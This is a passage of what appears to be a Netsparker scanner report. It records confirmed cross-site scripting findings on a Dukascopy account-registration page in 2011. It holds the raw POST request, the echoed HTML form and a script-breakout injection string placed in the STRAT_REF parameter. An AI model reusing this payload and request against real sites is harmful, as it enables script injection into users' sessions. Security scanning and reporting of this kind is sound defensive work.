&lt;option value=&apos;TC4ET&apos; &gt;&amp;nbsp;TC4ET&lt;/option&gt;
&lt;option value=&apos;TFGINC&apos; &gt;&amp;nbsp;TFGINC&lt;/option&gt;
&lt;option value=&apos;VASCON1&apos; &gt;&amp;nbsp;VASCON1&lt;/option&gt;
&lt;option value=&apos;VASCON2&apos; &gt;&amp;nbsp;VASCON2&lt;/option&gt;
&lt;option value=&apos;VASCON3&apos; &gt;&amp;nbsp;VASCON3&lt;/option&gt;
&lt;option value=&apos;VFGL5112&apos; &gt;&amp;nbsp;VFGL5112&lt;/option&gt;
&lt;option value=&apos;VHGLNM678&apos; &gt;&amp;nbsp;VHGLNM678&lt;/option&gt;
&lt;option value=&apos;VKCS52&apos; &gt;&amp;nbsp;VKCS52&lt;/option&gt;
&lt;option value=&apos;VNG409CG&apos; &gt;&amp;nbsp;VNG409CG&lt;/option&gt;
&lt;option value=&apos;Vulov10&apos; &gt;&amp;nbsp;Vulov10&lt;/option&gt;
&lt;option value=&apos;W2WFX&apos; &gt;&amp;nbsp;W2WFX&lt;/option&gt;
&lt;option value=&apos;WDFX&apos; &gt;&amp;nbsp;WDFX&lt;/option&gt;
&lt;option value=&apos;WDFX2&apos; &gt;&amp;nbsp;WDFX2&lt;/option&gt;
&lt;option value=&apos;WDXX&apos; &gt;&amp;nbsp;WDXX&lt;/option&gt;
&lt;option value=&apos;XYWFX&apos; &gt;&amp;nbsp;XYWFX&lt;/option&gt;
  
            &lt;/select&gt;&lt;br&gt;
			&lt;p&gt;&lt;input type=&quot;checkbox&quot; name=&quot;aData[extManAnswer]&quot; value=&quot;Yes&quot; id=extManContact0&gt;&lt;label for=extManContact0&gt; - &lt;b&gt;I expressly confirm that the selection/appointment of the External Manager is my own initiative without any recommendation from Dukascopy Bank SA. I have proceeded to a due diligence on the External Manager and will keep Dukascopy Bank SA harmless and fully indemnified against any and all losses, direct and indirect damages whether financial or not, resulting from my External Manager&amp;#039;s acts or omissions.&lt;/b&gt;&lt;/label&gt;
			&lt;/p&gt;&lt;br&gt;
          &lt;/td&gt;
        &lt;/tr&gt;

        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;200&quot; id=&quot;radio_accountKind_200&quot; checked onClick=&quot;fSetServProviderMode(true);fSetManagedAccountStrategyMode(false);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_200&quot;&gt;Service Provider&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
        &lt;td&gt;&lt;/td&gt;
          &lt;td valign=&quot;top&quot; id=&quot;sel_servProvider&quot; &gt;
			          
            &lt;b&gt;Whilst selecting your Service Provider and for convenience purposes only you may use the pull-down menu. Dukascopy has not performed any competence verification or due diligence, does not issue any recommendation concerning your Service Provider and can not be held liable for any losses, direct and indirect damages whether financial or not, resulting from your Service Provider&amp;#039;s acts or omissions.&lt;/b&gt;&lt;br&gt;
            &lt;select name=&quot;aData[serviceProvider]&quot; id=&quot;sel_mas2&quot;&gt;
		      &lt;option value=&apos;BBAC47&apos; &gt;&amp;nbsp;BBAC47&lt;/option&gt;
&lt;option value=&apos;BUSH1&apos; &gt;&amp;nbsp;BUSH1&lt;/option&gt;
&lt;option value=&apos;BUSH2&apos; &gt;&amp;nbsp;BUSH2&lt;/option&gt;
&lt;option value=&apos;GNM87FV&apos; &gt;&amp;nbsp;GNM87FV&lt;/option&gt;
&lt;option value=&apos;KRC1&apos; &gt;&amp;nbsp;KRC1&lt;/option&gt;
&lt;option value=&apos;KRC2&apos; &gt;&amp;nbsp;KRC2&lt;/option&gt;
&lt;option value=&apos;KRC3&apos; &gt;&amp;nbsp;KRC3&lt;/option&gt;
&lt;option value=&apos;TINL&apos; &gt;&amp;nbsp;TINL&lt;/option&gt;
&lt;option value=&apos;ZUXX&apos; &gt;&amp;nbsp;ZUXX&lt;/option&gt;
  
            &lt;/select&gt;&lt;br&gt;
			&lt;p&gt;&lt;input type=&quot;checkbox&quot; name=&quot;aData[servProviderAnswer]&quot; value=&quot;Yes&quot; id=servProvider0&gt;&lt;label for=servProvider0&gt; - &lt;b&gt;I expressly confirm that the selection/appointment of the Service Provider is my own initiative without any recommendation from Dukascopy Bank SA. I have proceeded to a due diligence on the Service Provider and will keep Dukascopy Bank SA harmless and fully indemnified against any and all losses, direct and indirect damages whether financial or not, resulting from my Service Provider&amp;#039;s acts or omissions. I hereby acknowledge and agree that Dukascopy Bank SA may communicate my UIN and e-mail address to the Service Provider.&lt;/b&gt;&lt;/label&gt;
			&lt;/p&gt;				
          &lt;/td&gt;
        &lt;/tr&gt;

      &lt;/table&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
     &lt;td colspan=&quot;2&quot; align=&quot;center&quot;&gt;
     &lt;div id=&quot;infoWTXX&quot;&gt;        
      &lt;/div&gt;
      &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;buttons&quot;&gt;
      &lt;input class=&quot;button&quot; type=&quot;submit&quot; name=&quot;next&quot; value=&quot;Submit&quot;&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;info&quot; style=&quot;padding:20 0 0 0;&quot;&gt;
  MINIMUM AMOUNT TO BE DEPOSITED&lt;br/&gt;TO OPEN A LIVE TRADING ACCOUNT IS 1 000 USD&lt;br/&gt;
(OR ITS EQUIVALENT IN OTHER CURRENCIES).&lt;br/&gt;
&lt;br/&gt;&lt;b&gt;Filling the application form, please use Latin letters only!&lt;/b&gt;&lt;br/&gt;
&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;
	&lt;/td&gt;
  &lt;/tr&gt;
&lt;input type=&quot;hidden&quot; name=&quot;aData[HTTP_REFERER]&quot; value=&quot;3&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;backFormMarker&quot; value=&quot;&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;currentFormMarker&quot; value=&quot;step1&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;nextFormMarker&quot; value=&quot;step2&quot;&gt;&lt;span style=display:none; id=hidHtmlConvert&gt;&lt;/span&gt;&lt;script&gt;
                function fFillFormField (oElement, value)    {
                    try {
                        switch(oElement.tagName) {
                            case &quot;TEXTAREA&quot;:
                            case &quot;TEXT&quot;:
                            	document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML = value; 
                            	oElement.value = document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML; 
								// oElement.value = value;
                            break;
                            case &quot;SELECT&quot;:
                                oElement.value = value;
                                bFound = false;
                                for (i=0; i&lt;oElement.options.length; i++)    {
                                    if(oElement.options[i].value == value)    {
                                        oElement.options[i].selected = true;
                                        bFound = true;
                                        break;
                                    }
                                }
                                if(value &amp;&amp; !bFound)    {
                                    oNew = document.createElement(&quot;OPTION&quot;);
                                    oNew.value = value;
                                    oNew.innerHTML = value;
                                    oElement.appendChild(oNew);
                                    oElement.lastChild.selected = true;
                                }
                            break;
                            default:
                                if(oElement.length)    {
                                    for(i=0;i&lt;oElement.length;i++)    {
                                        if(oElement[i].value == value)
                                            oElement[i].click();
                                        else
                                            oElement[i].checked = false;
                                    }
                                }
                                else {
                                    if(oElement.type == &quot;checkbox&quot;)
                                        oElement.click();
                                    else {
		                            	document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML = value; 
		                            	oElement.value = document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML; 
                                    //  oElement.value = value;
                                        }
                                }
                            break;
                        }
                        try    {
                            oElement.fireEvent(&quot;onchange&quot;);
                        }
                        catch(e) {
                            try {
                                var evt = document.createEvent(&quot;HTMLEvents&quot;);
                                evt.initEvent(&quot;change&quot;,true,true);
                                oElement.dispatchEvent( evt );
                            }
                            catch(e){}
                        }
                    }
                    catch(e){}
                }
                function fFillForm()    {
fFillFormField(document.mainForm[&quot;aData[STRAT_REF]&quot;], &quot;\&apos;\&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000110)&lt;/script&gt;&quot;);
fFillFormField(document.mainForm[&quot;aData[FEEDBACK_URL]&quot;], &quot;-1&quot;);
fFillFormField(document.mainForm[&quot;aData[TYPE]&quot;], &quot;2&quot;);
fFillFormField(document.mainForm[&quot;aData[accountKind]&quot;], &quot;200&quot;);
fFillFormField(document.mainForm[&quot;aData[serviceProvider]&quot;], &quot;BBAC47&quot;);
fFillFormField(document.mainForm[&quot;aData[servProviderAnswer]&quot;], &quot;Yes&quot;);}&lt;/script&gt;&lt;/form&gt;
&lt;/table&gt;
&lt;img id=&quot;progress_img&quot; src=&quot;../../images/progress_bar.gif&quot; width=&quot;69&quot; height=&quot;17&quot; border=&quot;0&quot; style=&quot;display:none;&quot;&gt;
  &lt;/body&gt;
&lt;/html&gt;
 ]]></rawresponse>

		<extrainformation>
		</extrainformation>


        <classification>
            <OWASP>A2</OWASP>
            <WASC>08</WASC>
            <CWE>79</CWE>
            <CAPEC>19</CAPEC>
        </classification>
				
	</vulnerability>

	<vulnerability confirmed="True">
		<url>https://live-login.dukascopy.com/fo/register/live/index.php</url>
		<type>XSS</type>
		<severity>Important</severity>
		
		<vulnerableparametertype>Post</vulnerableparametertype>
		<vulnerableparameter>aData%5BSTRAT_REF%5D</vulnerableparameter>
		<vulnerableparametervalue>&apos;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x00010E)&lt;/script&gt;</vulnerableparametervalue>

		<rawrequest><![CDATA[POST /fo/register/live/index.php HTTP/1.1
Referer: https://live-login.dukascopy.com/fo/register/live/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: live-login.dukascopy.com
Content-Length: 264
Accept-Encoding: gzip, deflate

aData%5BSTRAT_REF%5D=&apos;%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00010E)%3c%2fscript%3e&amp;aData%5BFEEDBACK_URL%5D=-1&amp;aData%5BTYPE%5D=1&amp;aData%5BaccountKind%5D=3&amp;aData%5BHTTP_REFERER%5D=3&amp;backFormMarker=3&amp;currentFormMarker=step1&amp;nextFormMarker=step2
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 200 OK
Date: Thu, 17 Mar 2011 19:25:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.3.3
Transfer-Encoding: chunked
Content-Type: text/html; charset=windows-1252



&lt;html lang=&quot;en&quot;&gt;
  &lt;head&gt;
    &lt;title&gt;Client Registration&lt;/title&gt;
    &lt;META http-equiv=Content-Type content=&quot;text/html; charset=windows-1252&quot;&gt;
    &lt;script&gt;
      function init()  {
        fFillForm();
      }

      var bShowWaiting = true;

      function showWaiting()  {
        if(bShowWaiting)  {
          for (odj in document.body.childNodes)
            try  {
	            document.body.childNodes[odj].style.display = &apos;none&apos;;
	          }catch(e){}

	        oProgressDiv = document.createElement(&apos;div&apos;);
	        document.body.appendChild(oProgressDiv);
	        oProgressDiv.align = &apos;center&apos;;
	        oProgressDiv.innerHTML = &quot;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;Please, wait&lt;br/&gt;&quot;;

	        tmp = document.getElementById(&apos;progress_img&apos;)
	        oProgressImg = tmp.cloneNode(false);
	        oProgressImg.style.display = &apos;block&apos;;
	        oProgressDiv.appendChild(oProgressImg);
	        bShowWaiting = false;
	      }
      }

    function addEventHandler(obj, type, func, useCapture) {
        if (obj.addEventListener) {
            obj.addEventListener(type, func, useCapture);
            return true;
        }
        else if (obj.attachEvent) {
            var r = obj.attachEvent(&apos;on&apos; + type, func);
            return r;
    	}
        else {
            obj[&apos;on&apos; + type] = func;
        }
    }

    tipIndex = 0;
    function drawTip (sTip, width) {
        this.hideDelay = 600;
        this.sTip = sTip;
        this.hideTimeoutId = null;
        var oThis = this;

        this.show = function (event) {
            var oEvent = (event || window.event);
            if (oThis.hideTimeoutId) {
                window.clearTimeout(oThis.hideTimeoutId);
                return;
            } else if (oThis.oTipContainer.style.display == &quot;block&quot;) {
                return;
            }
            aSelects = document.getElementsByTagName(&apos;SELECT&apos;);
            for (i=0; i &lt; aSelects.length; i++)  {
                aSelects[i].style.visibility = &apos;hidden&apos;;
            }
            oThis.oTipContainer.style.top = oEvent.clientY - oThis.oTipContainer.offsetHeight - 2;
            oThis.oTipContainer.style.left = oEvent.clientX + 3;
            oThis.oTipContainer.style.display = &quot;block&quot;;
        }

        this.hide = function () {
            oThis.hideTimeoutId = null;
            oThis.oTipContainer.style.display = &quot;none&quot;;
            aSelects = document.getElementsByTagName(&apos;SELECT&apos;);
            for (i=0; i &lt; aSelects.length; i++)  {
                aSelects[i].style.visibility = &apos;&apos;;
            }
        }

        this.hideTimeouted = function () {
            oThis.hideTimeoutId = window.setTimeout(oThis.hide, oThis.hideDelay);
        }

        document.write(&apos;&lt;img src=&quot;../../images/icons/16x16/tip.png&quot; align=&quot;absmiddle&quot; height=&quot;16&quot; width=&quot;16&quot; border=&quot;0&quot; id=&quot;tipImg&apos; + tipIndex + &apos;&quot;/&gt;&apos;);
        document.write(&apos;&lt;div class=&quot;tip&quot; style=&quot;display:none;&quot; id=&quot;tipContainer&apos; + tipIndex + &apos;&quot;&gt;&apos; + sTip + &apos;&lt;/div&gt;&apos;);

        this.oTipImg = document.getElementById(&apos;tipImg&apos; + tipIndex);
        this.oTipContainer = document.getElementById(&apos;tipContainer&apos; + tipIndex);
        if (typeof(width) != &apos;undefined&apos;)
            this.oTipContainer.style.width = width;
        addEventHandler(this.oTipImg, &apos;mouseover&apos;, this.show);
        addEventHandler(this.oTipContainer, &apos;mouseover&apos;, this.show);
        addEventHandler(this.oTipImg, &apos;mouseout&apos;, this.hideTimeouted);
        addEventHandler(this.oTipContainer, &apos;mouseout&apos;, this.hideTimeouted);
        tipIndex++;
    }
    &lt;/script&gt;
    &lt;!--&lt;script src=&quot;js/lib.js&quot;&gt;&lt;/script&gt;
    &lt;script src=&quot;js/checkForm.js&quot;&gt;&lt;/script&gt;--&gt;
  &lt;style&gt;
  body, td, span, div, p, tr, th, option, font, button, input, select, textarea, b, i, a {
    font-size:8pt;
    font-family:Verdana;
  }
  table  {
   table-layout:fixed;
  }
  a  {
    font-weight:bold;
    text-decoration:underline;
    color:black;
  }

  a:hover  {
    color:#666666;
  }

  .header  {
    font-size:11pt;
    height:24px;
    color:#FFFFFF;
    font-weight:bold;
    text-align:center;
    background-image: url(&apos;https://www.dukascopy.com/swiss/inc/images/headline_bg_menu.gif&apos;);
    background-color:#000;
    background-position:0px 0px;
    background-repeat:repeat-x;
  }

  .header a  {
    color:#FFFFFF;
    font-weight:bold;
    text-decoration:none;
  }

  .header a:hover  {
    color:#FFFFFF;
    text-decoration:underline;
  }

  .subheader  {
    font-size:10pt;
    color:#333333;
    font-weight:bold;
    text-align:center;
    padding:5 0 0 0;
  }

 .subheader *  {
    font-size:10pt;
    font-weight:bold;
  }

  .step  {
    font-size:10pt;
    color:#999999;
    font-weight:bold;
    text-align:center;
    padding:5 0 5 0;
  }
  .error  {
    font-size:10pt;
    color:#EE0000;
    text-align:center;
    padding:5 0 5 0;
    font-weight:bold;
  }
  .title  {
    text-align:right;
    width:50%;
    padding:2 2 2 2;
    color:#1D4470;
  }
  .field  {
    text-align:left;
    width:50%;
    padding:2 22 2 2;
  }
  .buttons  {
    text-align:center;
    padding:4 4 4 4;
  }
  .button  {
    color:white;
    border:1px outset;
    cursor:pointer;
    background-color:#1D4470;
    width:100px;
    font-weight:bold;
    height:13pt;
  }
  .info  {
    text-align:center;
    padding-left:22;
    padding-right:22;
  }
  input.text  {
    width:100%;
    border-top:1px solid #cccccc;
    border-right:1px solid #cccccc;
    border-bottom:1px solid #cccccc;
    border-left:1px solid #cccccc;
  }
  input.checkbox {

  }
  textarea  {
    width:100%;
    border:1px solid #cccccc;
    font-size:8pt !important;
    font-weight:normal !important;
  }
  select {
    border:1px solid #cccccc;
  }

  .tip {
    position:absolute;
    border: 1px solid #333333;
    background-color: #FFFFE1;
    width: 250px;
    padding: 7px;
    text-align: justify;
    z-index:100;
  }

  &lt;/style&gt;
  &lt;/head&gt;
  &lt;body onLoad=&quot;init();&quot; onBeforeUnload=&quot;showWaiting();&quot; style=&quot;margin:0px;padding:0px;&quot;&gt;
  &lt;div style=&quot;background:url(&apos;https://www.dukascopy.com/pics/topBackground.png&apos;) repeat-x;&quot;&gt;&lt;img src=&quot;https://www.dukascopy.com/pics/headers/website_logo_bank.jpg&quot; alt=&quot;Dukascopy&quot; style=&quot;width:579px;height:103px;border:none;&quot;&gt;&lt;/div&gt;
  &lt;table width=&quot;100%&quot; align=&quot;center&quot; border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot;&gt;
&lt;form style=&quot;margin:0px;padding:0px;&quot; name=&quot;mainForm&quot; action=&quot;/fo/register/live/index.php&quot; method=&quot;post&quot;&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;header&quot;&gt;
      Client Registration
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;step&quot;&gt;
      Step 1 of 6-12
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot;&gt;
      &lt;div class=&quot;error&quot; id=topError&gt;
      	      &lt;div&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td class=&quot;title&quot; valign=&quot;top&quot;&gt;
      Date:
    &lt;/td&gt;
    &lt;td class=&quot;field&quot; valign=&quot;top&quot;&gt;
      Thu, 17 Mar 2011    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td class=&quot;title&quot; valign=&quot;top&quot;&gt;
      Status:
    &lt;/td&gt;
    &lt;script&gt;
    	function radioClickControll() {
    		var retAcc = document.getElementById(&apos;radio_accountKind_6&apos;);
    		var stAcc  = document.getElementById(&apos;radio_accountKind_7&apos;);
    		var rInd   = document.getElementById(&apos;radio_type_1&apos;);
    		var rJoint = document.getElementById(&apos;radio_type_3&apos;);
    		var rLegal = document.getElementById(&apos;radio_type_2&apos;);

    		if(retAcc.checked) {
    			rLegal.disabled = true;
    		}
    		if(stAcc.checked) {
    			rLegal.disabled = false;
    		}

    		if(rLegal.checked) {
    			retAcc.disabled = true;
    		} 
    		if(rInd.checked || rJoint.checked) { 
    			retAcc.disabled = false;
    		}

    		
    	}
    &lt;/script&gt;
    &lt;td class=&quot;field&quot; valign=&quot;top&quot;&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;aData[STRAT_REF]&quot; value=&quot;-1&quot;&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;aData[FEEDBACK_URL]&quot; value=&quot;-1&quot;&gt;
      &lt;input type=&quot;radio&quot; name=&quot;aData[TYPE]&quot; id=&quot;radio_type_1&quot; value=&quot;1&quot; checked onclick=&quot;radioClickControll()&quot;&gt; &lt;label for=&quot;radio_type_1&quot;&gt;For Individuals&lt;/label&gt;&lt;br/&gt;
      &lt;input type=&quot;radio&quot; name=&quot;aData[TYPE]&quot; id=&quot;radio_type_3&quot; value=&quot;3&quot; onclick=&quot;radioClickControll()&quot;&gt; &lt;label for=&quot;radio_type_3&quot;&gt;For Joint Account&lt;/label&gt;&lt;br/&gt;
      &lt;input type=&quot;radio&quot; name=&quot;aData[TYPE]&quot; id=&quot;radio_type_2&quot; value=&quot;2&quot; onclick=&quot;radioClickControll()&quot;&gt; &lt;label for=&quot;radio_type_2&quot;&gt;For Legal Entities&lt;/label&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td class=&quot;title&quot; valign=&quot;top&quot;&gt;
      Kind of account:
    &lt;/td&gt;
    &lt;td class=&quot;field&quot; valign=&quot;top&quot;&gt;
      &lt;script&gt;
        function fSetManagedAccountStrategyMode(bShown)  {
          oInp = document.getElementById(&apos;sel_managedAccountStrategy&apos;);
          oInp.disabled = !bShown;
          oInp.style.display = (bShown?&quot;&quot;:&quot;none&quot;);
          if(bShown) {
          	document.getElementById(&apos;servProvider0&apos;).checked = false;
          }
        }
        
        function fSetServProviderMode(bShown)  {
          oInp = document.getElementById(&apos;sel_servProvider&apos;);
          oInp.disabled = !bShown;
          oInp.style.display = (bShown?&quot;&quot;:&quot;none&quot;);
          if(bShown) {
          	document.getElementById(&apos;extManContact0&apos;).checked = false;
          } 
        }
      &lt;/script&gt;
      &lt;table border=&quot;0&quot; cellpadding=&quot;1&quot; cellspacing=&quot;0&quot; style=&quot;table-layout:auto;&quot;&gt;
        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;&quot; style=display:none checked&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;6&quot; id=&quot;radio_accountKind_6&quot;  onClick=&quot;radioClickControll();fSetServProviderMode(false);fSetManagedAccountStrategyMode(false);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_6&quot;&gt;Retail Account&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        
        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;7&quot; id=&quot;radio_accountKind_7&quot;   onClick=&quot;radioClickControll();fSetServProviderMode(false);fSetManagedAccountStrategyMode(false);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_7&quot;&gt;Standard Account (from 50 000 USD)&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        
        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;100&quot; id=&quot;radio_accountKind_100&quot;  onClick=&quot;fSetServProviderMode(false);fSetManagedAccountStrategyMode(true);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_100&quot;&gt;Managed Account&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
        &lt;td&gt;&lt;/td&gt;
          &lt;td valign=&quot;top&quot; id=&quot;sel_managedAccountStrategy&quot; style=&quot;display:none;&quot; disabled&gt;
			          
            &lt;b&gt;Whilst selecting your Manager/Attorney and for convenience purposes only you may use the pull-down menu. Dukascopy has not performed any competence verification or due diligence, does not issue any recommendation concerning your Manager/Attorney and can not be held liable for any losses, direct and indirect damages whether financial or not, resulting from your Manager/Attorney&amp;#039;s acts or omissions.&lt;/b&gt;&lt;br&gt;
            &lt;select name=&quot;aData[managedAccountStrategy]&quot; id=&quot;sel_mas&quot;&gt;
		      &lt;option value=&apos;1ABEM3&apos; &gt;&amp;nbsp;1ABEM3&lt;/option&gt;
&lt;option value=&apos;356JFH1&apos; &gt;&amp;nbsp;356JFH1&lt;/option&gt;
&lt;option value=&apos;356JFH2&apos; &gt;&amp;nbsp;356JFH2&lt;/option&gt;
&lt;option value=&apos;356JFH3&apos; &gt;&amp;nbsp;356JFH3&lt;/option&gt;
&lt;option value=&apos;356JFH4&apos; &gt;&amp;nbsp;356JFH4&lt;/option&gt;
&lt;option value=&apos;356JFH5&apos; &gt;&amp;nbsp;356JFH5&lt;/option&gt;
&lt;option value=&apos;3SFX1&apos; &gt;&amp;nbsp;3SFX1&lt;/option&gt;
&lt;option value=&apos;3SFX2&apos; &gt;&amp;nbsp;3SFX2&lt;/option&gt;
&lt;option value=&apos;45GHKLBV&apos; &gt;&amp;nbsp;45GHKLBV&lt;/option&gt;
&lt;option value=&apos;AADB88&apos; &gt;&amp;nbsp;AADB88&lt;/option&gt;
&lt;option value=&apos;ABBB22&apos; &gt;&amp;nbsp;ABBB22&lt;/option&gt;
&lt;option value=&apos;ABEF73&apos; &gt;&amp;nbsp;ABEF73&lt;/option&gt;
&lt;option value=&apos;AEAC86&apos; &gt;&amp;nbsp;AEAC86&lt;/option&gt;
&lt;option value=&apos;AECC31&apos; &gt;&amp;nbsp;AECC31&lt;/option&gt;
&lt;option value=&apos;ALPX&apos; &gt;&amp;nbsp;ALPX&lt;/option&gt;
&lt;option value=&apos;ALTV&apos; &gt;&amp;nbsp;ALTV&lt;/option&gt;
&lt;option value=&apos;ARCH&apos; &gt;&amp;nbsp;ARCH&lt;/option&gt;
&lt;option value=&apos;ARXX&apos; &gt;&amp;nbsp;ARXX&lt;/option&gt;
&lt;option value=&apos;AZAT681&apos; &gt;&amp;nbsp;AZAT681&lt;/option&gt;
&lt;option value=&apos;Augustan&apos; &gt;&amp;nbsp;Augustan&lt;/option&gt;
&lt;option value=&apos;BABC92&apos; &gt;&amp;nbsp;BABC92&lt;/option&gt;
&lt;option value=&apos;BADF84&apos; &gt;&amp;nbsp;BADF84&lt;/option&gt;
&lt;option value=&apos;BAYWM&apos; &gt;&amp;nbsp;BAYWM&lt;/option&gt;
&lt;option value=&apos;BCAD67&apos; &gt;&amp;nbsp;BCAD67&lt;/option&gt;
&lt;option value=&apos;BCBC72&apos; &gt;&amp;nbsp;BCBC72&lt;/option&gt;
&lt;option value=&apos;BCCA82&apos; &gt;&amp;nbsp;BCCA82&lt;/option&gt;
&lt;option value=&apos;BCEE55&apos; &gt;&amp;nbsp;BCEE55&lt;/option&gt;
&lt;option value=&apos;BDAD35&apos; &gt;&amp;nbsp;BDAD35&lt;/option&gt;
&lt;option value=&apos;BDCC70&apos; &gt;&amp;nbsp;BDCC70&lt;/option&gt;
&lt;option value=&apos;BDCP&apos; &gt;&amp;nbsp;BDCP&lt;/option&gt;
&lt;option value=&apos;BEAD70&apos; &gt;&amp;nbsp;BEAD70&lt;/option&gt;
&lt;option value=&apos;BEAF55&apos; &gt;&amp;nbsp;BEAF55&lt;/option&gt;
&lt;option value=&apos;BECF19&apos; &gt;&amp;nbsp;BECF19&lt;/option&gt;
&lt;option value=&apos;BEDD59&apos; &gt;&amp;nbsp;BEDD59&lt;/option&gt;
&lt;option value=&apos;BEEE43&apos; &gt;&amp;nbsp;BEEE43&lt;/option&gt;
&lt;option value=&apos;BRKIC&apos; &gt;&amp;nbsp;BRKIC&lt;/option&gt;
&lt;option value=&apos;BUSH&apos; &gt;&amp;nbsp;BUSH&lt;/option&gt;
&lt;option value=&apos;BUSH288&apos; &gt;&amp;nbsp;BUSH288&lt;/option&gt;
&lt;option value=&apos;CBFB47&apos; &gt;&amp;nbsp;CBFB47&lt;/option&gt;
&lt;option value=&apos;CCDE32&apos; &gt;&amp;nbsp;CCDE32&lt;/option&gt;
&lt;option value=&apos;CCPFX&apos; &gt;&amp;nbsp;CCPFX&lt;/option&gt;
&lt;option value=&apos;CDCD88&apos; &gt;&amp;nbsp;CDCD88&lt;/option&gt;
&lt;option value=&apos;CDFD34&apos; &gt;&amp;nbsp;CDFD34&lt;/option&gt;
&lt;option value=&apos;CEDD62&apos; &gt;&amp;nbsp;CEDD62&lt;/option&gt;
&lt;option value=&apos;CEFA67&apos; &gt;&amp;nbsp;CEFA67&lt;/option&gt;
&lt;option value=&apos;CEFF58&apos; &gt;&amp;nbsp;CEFF58&lt;/option&gt;
&lt;option value=&apos;CFEC46&apos; &gt;&amp;nbsp;CFEC46&lt;/option&gt;
&lt;option value=&apos;CFFX&apos; &gt;&amp;nbsp;CFFX&lt;/option&gt;
&lt;option value=&apos;CGFX&apos; &gt;&amp;nbsp;CGFX&lt;/option&gt;
&lt;option value=&apos;CHBC&apos; &gt;&amp;nbsp;CHBC&lt;/option&gt;
&lt;option value=&apos;CLMFX&apos; &gt;&amp;nbsp;CLMFX&lt;/option&gt;
&lt;option value=&apos;CurrClub&apos; &gt;&amp;nbsp;CurrClub&lt;/option&gt;
&lt;option value=&apos;DADD65&apos; &gt;&amp;nbsp;DADD65&lt;/option&gt;
&lt;option value=&apos;DBAA26&apos; &gt;&amp;nbsp;DBAA26&lt;/option&gt;
&lt;option value=&apos;DBAF77&apos; &gt;&amp;nbsp;DBAF77&lt;/option&gt;
&lt;option value=&apos;DBFB93&apos; &gt;&amp;nbsp;DBFB93&lt;/option&gt;
&lt;option value=&apos;DCCD84&apos; &gt;&amp;nbsp;DCCD84&lt;/option&gt;
&lt;option value=&apos;DCEC93&apos; &gt;&amp;nbsp;DCEC93&lt;/option&gt;
&lt;option value=&apos;DDBF26&apos; &gt;&amp;nbsp;DDBF26&lt;/option&gt;
&lt;option value=&apos;DDCC49&apos; &gt;&amp;nbsp;DDCC49&lt;/option&gt;
&lt;option value=&apos;DDDB32&apos; &gt;&amp;nbsp;DDDB32&lt;/option&gt;
&lt;option value=&apos;DEFD33&apos; &gt;&amp;nbsp;DEFD33&lt;/option&gt;
&lt;option value=&apos;DF56NB&apos; &gt;&amp;nbsp;DF56NB&lt;/option&gt;
&lt;option value=&apos;DF794J0&apos; &gt;&amp;nbsp;DF794J0&lt;/option&gt;
&lt;option value=&apos;DFAF50&apos; &gt;&amp;nbsp;DFAF50&lt;/option&gt;
&lt;option value=&apos;DG785&apos; &gt;&amp;nbsp;DG785&lt;/option&gt;
&lt;option value=&apos;DOXX&apos; &gt;&amp;nbsp;DOXX&lt;/option&gt;
